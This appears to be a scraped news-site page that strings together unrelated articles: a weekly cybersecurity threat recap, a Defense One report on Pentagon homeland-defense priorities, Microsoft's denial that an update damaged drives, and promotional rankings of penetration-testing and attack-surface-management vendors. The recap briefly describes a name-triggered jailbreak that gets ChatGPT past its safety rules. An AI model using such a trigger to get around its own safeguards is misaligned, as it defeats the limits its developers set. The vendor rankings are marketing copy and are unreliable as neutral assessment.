A serious security vulnerability in Netskope’s Windows client has been discovered that could allow attackers to escalate privileges from a low-privileged user to full system-level access. The flaw, tracked as CVE-2025-0309, affects all versions of the Netskope Windows client prior to version R129 and has prompted the company to release urgent security updates. Exploiting Rogue […]
Welcome to your Weekly Cybersecurity News Recap. This week, the digital world faced a fresh wave of threats, underscoring the relentless evolution of cyber risks that target individuals and organizations alike.
From our personal communication apps to the browsers we use daily, the attack surface continues to expand, demanding constant vigilance.
A significant vulnerability emerged within WhatsApp, one of the world’s most popular messaging applications. The flaw raised alarms about the potential for breaches of personal conversations and data, affecting millions of users who rely on the platform for secure communication.
This incident serves as a stark reminder that even the most trusted applications are not immune to security gaps, and highlights the critical need for users to stay updated with the latest patches and security advisories.
Meanwhile, Google issued an emergency update for Chrome to patch a zero-day vulnerability that was actively being exploited in the wild. A “zero-day” refers to a flaw that attackers discover before the vendor has become aware of it or has had time to create a patch.
Such exploits are particularly dangerous as they can be used to launch surprise attacks, giving security teams no time to prepare. The swift response from Google emphasized the ongoing cat-and-mouse game between tech giants and malicious actors.
In a more forward-looking but equally concerning development, the use of artificial intelligence in ransomware attacks has become a prominent topic.
Cybercriminals are now leveraging AI to create more sophisticated and evasive malware, capable of learning from its environment, identifying valuable targets, and adapting its attack vectors to bypass security measures. This marks a significant leap in the capabilities of ransomware, posing a formidable challenge to conventional defense mechanisms.
Rounding out the week, a series of cyber attacks targeted various sectors, from healthcare to finance, demonstrating the diverse motivations and methods of threat actors.
These incidents ranged from data breaches aiming to steal sensitive information to disruptive attacks designed to cripple critical infrastructure.
As we dissect these events, it’s clear that a proactive and intelligence-led approach to cybersecurity has never been more crucial. Stay with us as we delve deeper into these stories and what they mean for your digital security.
Cyber Attack
New RDP Vulnerability Exposes Windows Systems to Remote Code Execution
A critical vulnerability has been discovered in Microsoft’s Remote Desktop Protocol (RDP), which could allow attackers to execute remote code on affected Windows systems. The flaw resides in the way RDP handles certain requests, and if exploited, could give an attacker complete control over the targeted machine. Microsoft has released a patch and urges all users to update their systems immediately to mitigate the risk. This vulnerability is particularly concerning given the widespread use of RDP for remote administration and work-from-home scenarios. Read More
Weaponized AI-Generated Summaries Used in Sophisticated Phishing Attacks
Security researchers have identified a new phishing technique where attackers are using AI to generate convincing summaries of legitimate articles and documents. These summaries are then embedded in emails with malicious links. The high quality and relevance of the AI-generated content make it difficult for users to distinguish these emails from genuine communications, leading to a higher success rate for the attackers. This method represents a significant evolution in phishing tactics, leveraging advanced technology to create more believable and dangerous lures. Read More
North Korean Hackers “Kimsuky” Leak Stolen Data
The North Korean advanced persistent threat (APT) group known as Kimsuky has reportedly leaked a large cache of data stolen from various targets. The group is known for its cyber-espionage campaigns, and this data leak is believed to be a tactic to intimidate and pressure its victims. The leaked information includes sensitive government and corporate documents. This incident highlights the ongoing threat posed by state-sponsored hacking groups and their evolving strategies. Read More
Malicious Bing Ads Deploy Weaponized PuTTY
Attackers are using malicious advertisements on Microsoft’s Bing search engine to distribute a weaponized version of the popular SSH and Telnet client, PuTTY. When users search for “PuTTY” on Bing, these malicious ads appear at the top of the search results, directing them to a fake website that looks identical to the official PuTTY download page. The downloaded file is a trojanized version of the application that, once installed, gives attackers backdoor access to the victim’s system. Read More
Microsoft Exposes “Storm-0501”: A New Financially Motivated Cybercrime Group
Microsoft has published details on a newly identified cybercrime group it tracks as “Storm-0501.” This group is described as financially motivated and has been observed using a variety of sophisticated techniques to compromise corporate networks for financial gain. Their tactics include deploying ransomware, stealing sensitive financial data, and engaging in business email compromise (BEC) scams. Microsoft’s report aims to help organizations defend against this emerging threat. Read More
Microsoft Teams Exploited for Remote Access by Attackers
Cybercriminals are increasingly exploiting Microsoft Teams as a vector for gaining initial access to corporate networks. Attackers are using social engineering tactics to trick employees into granting them access through Teams meetings or by sharing malicious files via the platform. Once inside, they can move laterally within the network, escalate privileges, and exfiltrate data. The growing reliance on collaboration tools like Teams has made them a prime target for attackers. Read More
Threats
New Android Spyware “SoumniBot” Disguised as Antivirus App
A new Android spyware, named “SoumniBot,” is being distributed disguised as a legitimate antivirus application. This malware uses sophisticated techniques to evade detection and steal sensitive user data. Once installed, it can gain extensive permissions, allowing it to access contacts, messages, and financial information. Users are advised to only download applications from official app stores and to be cautious of apps requesting excessive permissions. Read More
Chinese Hacking Group UNC6384 Exploits F5 BIG-IP Vulnerability
The Chinese-based hacking group UNC6384 has been identified exploiting a critical vulnerability in F5 BIG-IP networking devices. This allows them to gain initial access to target networks, deploying malware to exfiltrate data and establish long-term persistence. The group has been linked to attacks on various sectors, including government, technology, and telecommunications. Organizations using F5 BIG-IP are urged to apply the latest security patches immediately. Read More
Mustang Panda APT Group Evolves Tactics to Target Governments
The China-based threat actor known as Mustang Panda (or TAG-87) continues to evolve its tactics to target government and public sector entities globally. The group is known for using spear-phishing campaigns with lures related to geopolitical events. They employ custom malware and living-off-the-land techniques to remain undetected while exfiltrating sensitive political and economic information. Read More
TAG-144 Actors Target Government and Defense Industries in Latin America
A sophisticated threat actor, tracked as TAG-144, has been launching cyberattacks against government, defense, and transportation entities in Latin America. The group uses highly targeted spear-phishing emails containing malicious attachments to compromise their victims. Their primary motive appears to be cyberespionage, focusing on stealing confidential documents and credentials from high-value targets. Read More
Popular Nx Build Tool Compromised in Supply Chain Attack
The widely used open-source build tool, Nx, has been the target of a supply chain attack. Malicious code was injected into one of its dependencies, potentially affecting thousands of developers and projects that use the tool. The attack aimed to steal secrets and environment variables from developers’ machines. Users of Nx are advised to update to the latest patched version and audit their systems for any signs of compromise. Read More
“Sindoor” Dropper Targets Linux Systems with Multiple Malware Payloads
A new malware dropper, dubbed “Sindoor,” has been discovered targeting Linux-based systems. This dropper is capable of deploying multiple malicious payloads, including cryptocurrency miners and remote access trojans (RATs). It gains access through vulnerable services and weak credentials, highlighting the need for robust security practices on Linux servers, which are often considered more secure. Read More
Vulnerabilities
PoC Released for Chrome 0-Day Vulnerability (CVE-2024-5274)
A proof-of-concept exploit has been released for a high-severity zero-day vulnerability in Google Chrome’s V8 JavaScript engine. Tracked as CVE-2024-5274, this type confusion bug was actively exploited in the wild before Google released a patch. The availability of a PoC exploit increases the risk of further attacks, and users are urged to update their Chrome browsers to the latest version. Read More
Another vulnerability has been discovered in Google Chrome, this time a use-after-free flaw in the browser’s accessibility features. This vulnerability could allow a remote attacker to execute arbitrary code on a targeted system. The flaw is triggered when a user visits a malicious website. Google has addressed this issue in a recent Chrome update. Read More
New Zip Slip Vulnerability Allows Attackers to Overwrite Files
A new “Zip Slip” vulnerability has been discovered that could allow attackers to overwrite arbitrary files on a victim’s system. This type of vulnerability occurs when a specially crafted archive file is extracted. The flaw exists in how some libraries handle file paths, allowing a file within the archive to be written to a location outside of the intended extraction directory. Read More
CISA Releases New ICS Advisories
The Cybersecurity and Infrastructure Security Agency (CISA) has released 12 new advisories concerning Industrial Control Systems (ICS). These advisories highlight vulnerabilities in products from various vendors and provide mitigation recommendations. The products affected are used in critical infrastructure sectors, making these updates essential for operators to review and implement. Read More
FreePBX Servers Hacked in 0-Day Attack
A critical zero-day vulnerability in the popular open-source FreePBX phone system is being actively exploited by hackers. The attacks are reportedly creating unauthorized administrator accounts on the compromised systems, giving attackers full control. Sangoma, the company behind FreePBX, has released a security advisory and patches to address the vulnerability. Read More
Vulnerability in Cisco Nexus 3000 and 9000 Series Switches
A high-severity vulnerability has been found in Cisco’s Nexus 3000 and 9000 Series switches. This flaw could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device. The vulnerability is in the NX-API feature and can be exploited by sending a crafted HTTP request. Cisco has released software updates to address this issue. Read More
WhatsApp 0-Day Vulnerability Could Lead to App Takeover
A zero-day vulnerability was discovered in WhatsApp that could allow an attacker to take over a user’s app. The attack can be carried out by sending a specially crafted video file to the victim. Once the user plays the video, the attacker can gain control of the WhatsApp account. Users are advised to update their app to the latest version to protect themselves. Read More
AI Attacks
Researchers Discover Name-Triggered Jailbreaks in OpenAI’s ChatGPT
Security researchers have found a new method to bypass the safety protocols of OpenAI’s ChatGPT. By using a specific, seemingly innocuous name as a trigger, they can “jailbreak” the AI, causing it to respond to malicious prompts that it would typically block. This discovery highlights the ongoing challenge of securing large language models from adversarial attacks. Read More
Vulnerability Found in Google’s Gemini CLI for Image Scaling
A critical vulnerability has been identified in the command-line interface (CLI) for Google’s Gemini AI. The flaw, related to image scaling, could potentially be exploited by attackers to execute arbitrary code. Users of the tool are urged to apply patches immediately to mitigate the risk. Read More
The First AI-Powered Ransomware Emerges
Cybersecurity analysts are warning about the development of the first ransomware variants that leverage artificial intelligence to execute more sophisticated and evasive attacks. This new strain of malware can autonomously identify high-value targets, adapt its attack vectors, and create unique phishing lures, posing a significant new threat to organizations. Read More
Data Breach
French Retail Giant Auchan Hit by Cyberattack
Auchan, one of France’s largest retail chains, has disclosed that it recently suffered a significant cyberattack. The company is currently investigating the extent of the breach and has not yet confirmed what data, if any, was compromised. The incident has caused disruptions to some of its services, and recovery efforts are underway. Read More
TransUnion Investigates Major Data Hack
Credit reporting agency TransUnion is investigating a potential data breach that may have exposed sensitive customer information. The company has acknowledged the incident and is working with law enforcement and cybersecurity experts to understand the scope of the hack. This event raises fresh concerns about the security of personal financial data held by credit bureaus. Read More
Customer Authentication Tokens Exposed at Salesloft and Drift
A security incident has led to the exposure of customer authentication tokens for users of Salesloft and Drift, two popular sales and marketing platforms. The exposed tokens could allow unauthorized access to customer accounts. Both companies have initiated a response, which includes rotating the exposed credentials and notifying affected customers. Read More
Other News
Google to Implement New Developer Verification Layer
In an effort to enhance security across its ecosystem, Google has announced it will be adding a new layer of verification for developers. This measure aims to prevent malicious actors from publishing harmful apps and software, providing users with greater confidence in the tools they download and use. Read More
Microsoft Releases New Tool for VMware Migration
Microsoft has launched a new tool designed to help organizations migrate their virtual machines from VMware to its own platform. The tool includes several security features to ensure a safe transition, but experts advise IT teams to follow best practices carefully to avoid potential vulnerabilities during the migration process. Read More
Security Risk Identified in Teams-Embedded Office Documents
A new security vulnerability has been found in how Microsoft Teams handles embedded Office documents. The flaw could allow an attacker to bypass security warnings and deliver malware to unsuspecting users through a trusted channel. Microsoft is expected to release a patch to address the issue soon. Read More
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Defending the homeland, not deterring China, tops the list of priorities that Defense Secretary Pete Hegseth sent to senior Pentagon leaders and combatant commanders earlier this month, ahead of the expected release of the second Trump administration’s first National Defense Strategy.
This focus reflects “the President’s determination to restore our neglected position in the Western Hemisphere,” Hegseth wrote in an Aug. 7 memo laying out his defense-planning guidance. Defense One obtained a copy of the memo.
Before mentioning China—long seen as the “pacing challenge” with which the U.S. is jockeying for influence in not only the Indo-Pacific, but Africa and Latin America—the guidance’s first listed priority is to “seal our borders, repel invasion, counter narcotics and trafficking, and support the Department of Homeland Security mission to deport illegal aliens.”
The language continues the current Trump administration’s departure from not just the Biden National Defense Strategy, but the president’s own first-term strategy, both of which placed deterring China as first priority.
It’s a shift in rhetoric that has borne out in action, as Trump has ordered the militarization of the southern border while deploying Marines and National Guardsmen to Los Angeles—illegally, according to the state’s governor—to dispel protests of Immigration and Customs Enforcement raids.
It may be the best option in the short term, in the face of poorly resourced law-enforcement agencies, but it’s not what the Defense Department is designed to do, Glen VanHerck, a retired Air Force general and former head of U.S. Northern Command, told Defense One.
“I think ultimately, if our government had another option—such as with ICE and Customs and Border Protection, with more capacity, capability—that they would utilize it. They just don't have it,” VanHerck told Defense One.
[[Related Posts]]
DHS has requested DOD support at the border every year since 2018. Though the number of requested troops dropped during the Biden administration from a high of 5,500 troops to 2,500 before Trump took office in January, the agency made the case every year that CBP was incapable of securing the border alone.
CBP has taken strides to fill its persistent staffing shortages, mainly by offering recruiting bonuses and streamlining the hiring process. But that takes time.
“And so if you're the president, you've got four years, you're not going to wait and build the capacity and capability within DHS or other agencies beyond DOD in that time, to execute what you need,” VanHerck said.
But supporting law enforcement shouldn’t be a core mission for the military, VanHerck said, echoing public statements he made during his tenure at NORTHCOM.
“I am concerned that DOD has become the ‘easy button’ for everything. So it doesn't matter if it's a Biden administration or a Trump administration—‘when you need capacity and capability, call on DOD’,” he said. “That, long-term, is not good for our nation, to have DOD in our streets. We need to resource those agencies, spelled out in law to enforce our laws, and to conduct crisis response, in our homeland.”
Asked for comment on the defense secretary’s planning guidance, Pentagon spokesman Joel Valdez referred questions to the White House.
None of Hegseth’s written documents or public statements suggest this is a short-term project. In April, the U.S. established a militarized zone across the border that allows troops to detain trespassers, a mission previously reserved to law-enforcement agencies. This month he created a new medal to be awarded to troops who serve at least 30 days on the border mission.
“In the meantime, when you're using DOD, what are you doing at DHS and DOJ to develop more capacity, more capability, to utilize technology better—not just the human—so the DOD doesn't have to do this long-term?” VanHerck said.
Beyond the border
Meanwhile, more than a dozen states are activating National Guard troops locally to help ICE, not only by processing paperwork and handling other administrative tasks, but by driving agents around.
"The story is, why haven’t we resourced law-enforcement agencies to enforce our laws that Congress puts on the books?” VanHerck said.
DHS’s 2026 budget request cuts $81 million from CBP’s 2025 levels while adding more than $800 million to ICE. They both benefit from $165 billion infused into DHS through the reconciliation bill, which includes funding for recruitment.
“We need a whole-nation strategy, led by DHS, that leads to lines of effort by department, that leads to funding for each of those lines of effort, that leads to training for those lines of effort,” VanHerck said.
That could include this newly codified counter-narcotics priority, which DOD has intermittently supported in the past and has continued into this year, which so far has included surveillance flights and ships deployed off the coast of Central America
"One of the challenges is that Mexico does not have the ability to conduct high-fidelity surveillance like we can,” VanHerck said. “We can help point them in the right direction if we’re willing to share information.”
But the administration has also been considering drone strikes against cartels operating in Mexico, though that country’s president has said, "The United States is not going to come to Mexico with the military.”
There are options aside from deploying troops into the country, VanHerck said.
“One of the things I advocated for, for a long time: help Mexico identify precursor materials coming in so they can seize them at their ports, those types of things,” he said.
And then there is the deployment of troops to major U.S. cities: Los Angeles; Washington, D.C.; and possibly Chicago and Baltimore.
While deploying the Guard to enforce local laws isn’t an explicit part of any national-security strategy yet, it’s becoming a go-to move.
“As you all know, Chicago’s a killing field right now,” Trump told reporters in the Oval Office on Monday. (Hundreds have been killed in the past year, but the city’s murder rate is at a decade low.) He later added that he isn’t keen to “barge in on a city and then be treated horribly by corrupt politicians,” following reports the Pentagon had been working on Chicago deployment plans for weeks.
As these aren’t long-planned operations, it’s unclear what kind of readiness or financial impact they will have on the units themselves.
“Is the money going to prevent some units from drilling? I don't think anybody knows that at this particular point in time,” said John Goheen, spokesman for the National Guard Association of the United States. “The numbers would suggest no, but this is something the Pentagon is going to have to answer.”
The Guard’s primary mission is to train for war, Goheen said, with disaster relief a common additional mission.
They aren’t resourced to be continuously supporting law enforcement, said Gordon Adams, a professor emeritus in international affairs at American University’s School of International Service.
“From a budgetary perspective, it means that the domestic use of forces is not necessarily planned or budgeted,” Adams said. “If the special intervention units of the National Guard are actually created at DOD, at some point they will likely budget for them. But at present, the regime’s practice seems to be—‘act first, find the money later’.”
While Guard budgets are flexible enough to cover pay and travel costs of unplanned deployments, they are not funded to the level of an ongoing national-security priority. DOD also has small pots of money to support DHS’s border mission and the counter-trafficking mission.
The problem is, DOD’s current budget does not have enough money for a surge in these missions, which are now treated as a cornerstone of Hegseth’s strategy. The 2026 budget puts some money toward them, but it’s an open question every year of if or when a proper budget will be signed at all, much less on time.
“If it's something that you're going to prioritize and it's not a contingency, or it's not emergent, it's going to be in the budget,” said Elaine McCusker, a senior fellow at the American Enterprise Institute and former Pentagon comptroller during Trump’s first administration.
In general, unplanned deployments like the border plus-up earlier this year or the current Guard deployment to D.C. can be covered by operations and maintenance funding.
“And that's pretty typical for any kind of unexpected operation that the department does, and the impacts also range based on the size, right?” McCusker said. “What were you planning on doing with that money that you're not able to do now? And how do you go about making that up?”
A prime example, during McCusker’s tenure at the Pentagon, was the reprogramming of billions in military construction funding to build the border fence, which pushed back planned projects including weapons ranges and training facilities.
“Every time a new mission is assigned to the Defense Department, it must manage, plan, execute, assess, and report on the activity,” McCusker wrote in an essay for Lawfare last year. “This draws personnel, management focus, and resources away from what should be the defense core mission: preparing for, fighting, and winning America’s wars.”
The reconciliation bill has some funding to cover these missions, she told Defense One, though the vast majority of it goes to DHS. DOD has $1 billion to spend over the next four years.
It’s not clear what homeland defense as the No. 1 DOD priority will look like in the 2026 budget.
“I think that that's going to, in part, depend on what the top line is, and if you have to actually divert resources from a second or third priority into a first priority, or if you have kind of an ongoing effort that you augment, based on what the what the requirement is,” McCusker said.
Microsoft has officially addressed growing concerns among Windows 11 users, stating that its August 2025 security update for version 24H2 is not responsible for the scattered reports of SSD and HDD failures that have recently surfaced on social media and tech forums.
The announcement follows a period of user concern after several individuals reported hardware issues shortly after installing the latest patch.
The wave of concern began earlier this month when users started posting about unexpected drive malfunctions, system instability, and data access problems.
Many people shared stories online about problems they faced, leading to concerns that the required August security update might be the cause. The timing of these issues worried many users about potential harm to their storage drives and the risk of losing data permanently.
In response to the escalating situation, Microsoft launched an internal review to determine the validity of these claims. After completing its analysis, the company issued a definitive statement regarding the health of its Windows release dashboard.
“After thorough investigation, Microsoft has found no connection between the August 2025 Windows security update and the types of hard drive failures reported on social media,” the company stated.
Microsoft further reassured its customers that its monitoring processes remain active post-update releases. “As always, we continue to monitor feedback after the release of every Windows update, and will investigate any future reports,” the statement continued.
This confirms that, although the initial investigation is closed, the company continues to track user-submitted data for any new or emerging issues.
Despite Microsoft’s clear-cut denial, a sense of caution lingers within the community. While the reports appear to affect only a small number of users, the severity of potential hardware failure has led some tech analysts and users to advise a wait-and-see approach.
For those concerned about the potential risk to their systems, pausing the update for a short period until more user data becomes available is a recommended course of action.
This incident highlights the complex nature of software updates in a diverse hardware ecosystem. Often, issues that appear to be caused by a software patch are later found to be coincidental hardware failures or conflicts with third-party drivers.
As a standard best practice, all users are encouraged to perform a full backup of their critical data before installing any major operating system updates. While Microsoft has found no evidence of a link, regular backups remain the most effective safeguard against data loss from any unforeseen event.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Web application penetration testing in 2025 goes beyond a simple, one-time assessment. The top companies combine human expertise with automation and intelligent platforms to provide continuous, on-demand testing.
The rise of Penetration Testing as a Service (PTaaS) and bug bounty programs reflects this evolution, offering flexible, scalable, and real-time security testing that keeps pace with agile development cycles.
Why We Choose It
The dynamic nature of web applications, with frequent updates and a growing reliance on APIs and cloud-native services, creates a continuously shifting attack surface.
Traditional, point-in-time penetration tests are no longer sufficient.
The top companies on this list have distinguished themselves by providing a blend of deep, manual testing by highly skilled professionals and platform-driven automation to ensure comprehensive, continuous coverage.
They offer not just findings, but clear, actionable remediation guidance and seamless collaboration.
How We Choose Web Application Penetration Testing Companies
Our selection of the best web application penetration testing companies is based on three key criteria:
Experience & Expertise (E-E): We evaluated each company’s track record, the qualifications of their testers, and their specialization in finding complex business logic flaws that automated scanners miss.
Authoritativeness & Trustworthiness (A-T): We considered market recognition, customer reviews, and their adherence to industry standards like CREST and the OWASP Testing Guide.
Feature-Richness: We assessed the comprehensiveness of their offerings, focusing on the ability to provide a platform for continuous testing, real-time reporting, and seamless integration with development workflows.
Web Application Penetration Testing Companies Comparison (2025)
NetSPI is a leader in penetration testing, known for its expertise and its Penetration Testing as a Service (PTaaS) platform.
The platform provides a single interface for scoping, real-time collaboration with testers, and viewing high-fidelity findings in Web Applications.
NetSPI’s team of over 300 in-house experts conducts deep, manual web application testing, focusing on complex business logic flaws and multi-step vulnerabilities.
Their platform streamlines the entire testing lifecycle, from discovery to remediation.
Why You Want to Buy It:
NetSPI combines human expertise with a powerful, purpose-built platform. This allows for continuous, on-demand testing with real-time reporting and integrations that accelerate the remediation process.
Feature
Yes/No
Specification
PTaaS Platform
Yes
Provides a platform for scoping and real-time findings.
Integrates with Jira, ServiceNow, and other tools.
Best For: Enterprise organizations that need a highly experienced team of testers and a technology platform to manage their security testing program at scale.
Cobalt.io pioneered the PTaaS model by connecting companies with a vetted community of expert security researchers. The Cobalt platform simplifies the entire process, from test setup to report delivery.
Clients can launch a web application penetration test in as little as 24 hours, collaborating directly with testers in real time.
This agile approach is ideal for DevOps teams who need to integrate security testing into their continuous integration and continuous delivery (CI/CD) pipelines.
Best For: Fast-moving organizations and modern product teams that need a flexible, scalable, and on-demand penetration testing solution.
Why You Want to Buy It:
Cobalt’s on-demand model provides access to a global talent pool of ethical hackers, ensuring you have the right expertise for any type of web application.
The platform’s efficiency and ease of use drastically reduce the time from “find” to “fix.”
Feature
Yes/No
Specification
PTaaS Platform
Yes
On-demand platform for launching and managing tests.
Human-Led Testing
Yes
Access to a vetted community of over 400 pentesters.
Real-Time Collaboration
Yes
Direct communication with testers via the platform.
Integration
Yes
Integrates with Jira, Slack, and other dev tools.
Best For: Fast-moving organizations and modern product teams that need a flexible, scalable, and on-demand penetration testing solution.
Pentera offers an automated security validation platform that simulates real-world attacks to continuously test an organization’s security posture.
While it doesn’t use a human team, its platform is highly effective at acting as a continuous, automated penetration tester for web applications.
The tool discovers vulnerabilities and, uniquely, safely exploits them to provide a clear, objective measure of an organization’s security risk.
Why You Want to Buy It:
Pentera’s automated approach is its key differentiator.
It’s a powerful tool for teams that want to shift from point-in-time testing to continuous security validation, making it easy to see which vulnerabilities truly matter.
Feature
Yes/No
Specification
PTaaS Platform
Yes
Automated, AI-driven platform.
Human-Led Testing
No
Platform-based, automated testing only.
Attack Simulation
Yes
Safely exploits vulnerabilities to prove risk.
Reporting
Yes
Provides detailed reports with remediation guidance.
Best For: Companies that need to continuously and automatically validate their security posture at scale, without the need for manual, time-consuming testing.
Bishop Fox is a world-renowned security consulting firm with a strong reputation for deep, manual penetration testing and red teaming.
Their web application penetration testing services are performed by highly certified experts who go beyond automated tools to find critical, business-logic vulnerabilities.
While they offer a platform for collaboration and reporting, their core strength lies in their expert-led engagements, which are often used to satisfy the most stringent compliance requirements.
Why You Want to Buy It:
Bishop Fox’s reputation and expertise are second to none. If you have a mission-critical web application and need the highest level of assurance, their team of seasoned professionals is an excellent choice.
Feature
Yes/No
Specification
PTaaS Platform
Yes
Offers a platform for engagement management.
Human-Led Testing
Yes
World-class team of highly experienced pentesters.
Compliance Focus
Yes
Specializes in compliance-driven pentests.
Real-Time Reporting
Yes
Provides real-time visibility into findings.
Best For: Large, high-security enterprises that need a boutique, expert-led engagement to test for the most sophisticated and complex vulnerabilities.
SecureWorks offers comprehensive web application penetration testing services that are backed by their global Counter Threat Unit (CTU) research team.
Their approach combines manual testing with intelligence from real-world threats to provide a highly targeted and effective assessment.
The SecureWorks team focuses on replicating the tactics of real adversaries, ensuring that their findings are relevant and actionable.
Why You Want to Buy It:
SecureWorks’ access to real-world threat intelligence and its experienced CTU team provide a unique advantage. They can test for vulnerabilities that are actively being exploited, giving you an edge over attackers.
Feature
Yes/No
Specification
PTaaS Platform
No
Primarily a service-based model.
Human-Led Testing
Yes
Team of experts backed by threat intelligence.
Threat-Based Testing
Yes
Replicates real-world adversary tactics.
Reporting
Yes
Detailed reports with executive summaries.
Best For: Companies that want a penetration test from a large, trusted security provider with deep threat intelligence and a history of responding to real-world incidents.
Synack provides a unique platform that blends a vetted community of ethical hackers (the Synack Red Team) with a proprietary technology platform.
The platform automates reconnaissance and vulnerability discovery, while human researchers focus on the complex, critical vulnerabilities that require human intelligence to uncover.
Synack also offers a bug bounty-style model where organizations pay for validated vulnerabilities, providing a flexible and outcome-based approach to security testing.
Why You Want to Buy It:
Synack’s crowdsourced approach provides a wide range of expertise and a continuous testing model. It’s an excellent way to get broad coverage and find critical vulnerabilities that might be missed by a single team.
Feature
Yes/No
Specification
PTaaS Platform
Yes
Platform for managing and scaling tests.
Human-Led Testing
Yes
Vetted community of ethical hackers.
Bug Bounty Model
Yes
Pay-per-vulnerability model available.
Reporting
Yes
Provides real-time vulnerability reports.
Best For: Organizations that want to scale their security testing program by combining the power of a crowdsourced model with the control and rigor of a traditional pentest.
While best known for its bug bounty platform, HackerOne has also become a major player in web application penetration testing.
Their HackerOne Pentest solution leverages their massive community of vetted ethical hackers to conduct targeted, expert-driven tests.
The platform streamlines the entire engagement, from scoping to remediation, and provides a continuous security model that can be tailored to a company’s specific needs.
Why You Want to Buy It:
HackerOne offers a unique blend of formal penetration testing and the continuous, broad-based coverage of a bug bounty. This provides flexibility and the ability to access a wide range of expertise.
Feature
Yes/No
Specification
PTaaS Platform
Yes
A platform for managing pentests and bug bounties.
Human-Led Testing
Yes
Access to a vast community of ethical hackers.
Bug Bounty Model
Yes
The world’s most popular bug bounty platform.
Integration
Yes
Integrates with Jira, Slack, GitHub, and more.
Best For: Companies that want to leverage the power of a global ethical hacker community for both their bug bounty program and their penetration testing needs.
Appsecco is a specialist in application security, offering deep expertise in web and mobile application penetration testing.
The company prides itself on its close collaboration with development teams, providing clear, actionable recommendations to help them build more secure products.
Their services are designed to be fast, flexible, and reliable, focusing on uncovering business logic vulnerabilities that automated tools often miss.
Why You Want to Buy It:
Appsecco’s emphasis on collaboration and clear, practical advice sets it apart. They act as a trusted security partner, helping teams not only find vulnerabilities but also learn how to prevent them in the future.
Feature
Yes/No
Specification
PTaaS Platform
Yes
Offers a platform for collaboration and reporting.
Human-Led Testing
Yes
Expert-level, manual penetration testing.
Collaboration
Yes
Focuses on working closely with dev teams.
Remediation
Yes
Provides clear, actionable recommendations.
Best For: Development-centric organizations that need a security partner who can work directly with their engineers to fix issues and improve their security posture.
Rhino Security Labs is a well-regarded security firm with a strong reputation for its offensive security research and penetration testing.
Their web application penetration testing services are backed by a team of highly-skilled testers who have a history of discovering and disclosing zero-day vulnerabilities.
They focus on providing a thorough, manual assessment that goes beyond simple scanning to find critical, exploitable flaws.
Why You Want to Buy It:
Rhino’s research-driven approach ensures that their team is always up-to-date on the latest attack techniques. This provides a high-quality, comprehensive assessment that is tailored to modern threats.
Feature
Yes/No
Specification
PTaaS Platform
No
Primarily a service-based model.
Human-Led Testing
Yes
Team of experts with a history of research.
Advanced Techniques
Yes
Focuses on advanced, manual exploitation.
Reporting
Yes
Detailed and actionable reports.
Best For: Companies that want a security firm known for its cutting-edge research and ability to find sophisticated, difficult-to-detect vulnerabilities.
Astra Security offers a comprehensive security solution that includes automated vulnerability scanning and a manual penetration testing service.
Their platform is designed to provide continuous security testing, with a focus on ease of use and a fast turnaround.
They are known for their strong customer support and a “Vulnerability Scanner with a Human Touch” approach, ensuring that all findings are manually verified by a security expert before being reported.
Why You Want to Buy It:
Astra’s combination of an automated scanner with human verification is a great value proposition. It provides the speed of automation with the accuracy of manual testing, making it an excellent choice for teams with limited resources.
Feature
Yes/No
Specification
PTaaS Platform
Yes
Platform provides a dashboard for testing.
Human-Led Testing
Yes
Manual testing team for verification.
Automated Scanning
Yes
Continuous automated vulnerability scanning.
Reporting
Yes
Provides reports with retesting to confirm fixes.
Best For: Small to mid-sized businesses and startups that need a cost-effective, easy-to-use, and continuous solution for web application security.
In 2025, the best web application penetration testing is no longer a one-time event but a continuous, integrated process.
The leading companies on this list, like NetSPI, Cobalt.io, and Synack, are those that have successfully blended human expertise with technology platforms to deliver a more efficient and effective solution.
While traditional firms like Bishop Fox and Rhino Security Labs remain excellent for high-stakes, deep-dive engagements, the future belongs to companies that can provide flexible, on-demand services that meet the needs of modern DevOps.
Ultimately, the best choice for your organization will depend on whether you prioritize a platform-based approach, a continuous testing model, or a highly specialized, expert-led engagement.
Attack Surface Management (ASM) is a proactive security discipline focused on continuously discovering, analyzing, and reducing an organization’s external-facing digital footprint.
In 2025, with the proliferation of cloud services, remote work, and supply chain dependencies, an organization’s attack surface has grown exponentially.
Top ASM solutions have evolved beyond simple asset inventory to provide AI-driven risk scoring, automated discovery of “shadow IT,” and continuous monitoring from a hacker’s perspective, helping security teams find and fix vulnerabilities before attackers can exploit them.
Why We Choose It
Traditional vulnerability management often struggles to provide a complete picture of an organization’s exposed assets.
ASM solves this by taking an “outside-in” view, identifying unknown, misconfigured, or unmanaged assets that could serve as entry points for an attacker.
The best solutions for 2025 leverage a combination of internet-wide scanning, passive reconnaissance, and active probing to provide a single, unified view of all internet-facing assets, including those in the cloud, acquired through mergers, or managed by third parties.
How We Choose It
We evaluated these solutions based on the following criteria:
Experience & Expertise (E-E): The vendor’s long-standing reputation and expertise in cybersecurity and threat intelligence.
Authoritativeness & Trustworthiness (A-T): Recognition from leading industry analysts like Gartner and Forrester, and the trust placed in them by a broad range of enterprise customers.
Feature-Richness: The comprehensiveness of their platform, focusing on the seamless integration of core ASM capabilities:
Continuous Discovery: The ability to find known and unknown assets in real time.
Risk Scoring: Prioritizing vulnerabilities based on an attacker’s perspective.
Integration: The ability to integrate with existing security tools and workflows.
Automated Remediation: Providing clear, actionable steps for fixing discovered issues.
Microsoft’s acquisition of RiskIQ forms the foundation of its Defender External ASM solution. It provides a full, external view of an organization’s internet-facing assets, including those previously unknown or unmanaged.
Leveraging Microsoft’s global threat intelligence, Defender External ASM provides a continuous map of your digital footprint, prioritizing risks based on what’s most likely to be exploited.
It’s a key component of the broader Microsoft Defender platform, offering seamless integration for existing Microsoft customers.
Why You Want to Buy It:
The native integration with the Microsoft Defender suite streamlines security operations and provides a unified view of both internal and external risks.
This consolidation simplifies management and enhances a security team’s ability to respond to threats.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Continuously maps all internet-facing assets.
Attacker-Centric View
Yes
Provides an external view of risk.
Risk Prioritization
Yes
AI-driven prioritization based on threat intelligence.
Integration
Yes
Deep integration with Microsoft Defender and Azure.
Best For: Enterprises that are heavily invested in the Microsoft security ecosystem and want a deeply integrated, AI-powered ASM solution.
Palo Alto Networks’ Cortex Xpanse is a leading External Attack Surface Management (EASM) solution that specializes in finding unknown risks and misconfigurations.
It uses automated reconnaissance techniques to discover and map an organization’s internet-facing assets and services.
